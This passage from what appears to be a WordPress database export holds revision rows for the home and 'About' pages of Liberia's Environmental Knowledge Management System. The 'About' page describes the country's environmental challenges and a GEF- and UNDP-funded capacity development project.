value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-on-biological-diversity/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_cbd-1-300x166.jpg\" alt=\"featured_cbd\"><figcaption><h6>UNCBD</h6>The United Nations Convention on Biological Diversity</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-framework-convention-on-climate-change/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_marine-300x151.jpg\" alt=\"Photo Credit: Dr. Kolleh Bangura. Coastal Erosion at Tropicana Beach, Paynesville, Liberia\"><figcaption><h6>UNFCCC</h6>The United Nations Framework Convention on Climate Change</figcaption></a></figure>\n	<figure><a href=\"https://ekmsliberia.info/mea-resource/united-nations-convention-to-combat-desertification/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/featured_ccd-300x166.jpg\" alt=\"featured_ccd\"><figcaption><h6>UNCCD</h6>The United Nations Convention to Combat Desertification</figcaption></a></figure>\n			<a href=\"https://ekmsliberia.info/multilateral-environmental-agreements/\" role=\"button\">\n						View All Agreements\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-20 09:13:47','2019-11-20 09:13:47','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2590,1,'2019-11-20 09:20:01','2019-11-20 09:20:01','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p style=\"background-color: lightgray;\">The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project will strengthen is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-20 09:20:01','2019-11-20 09:20:01','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2591,1,'2019-11-20 09:20:24','2019-11-20 09:20:24','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. 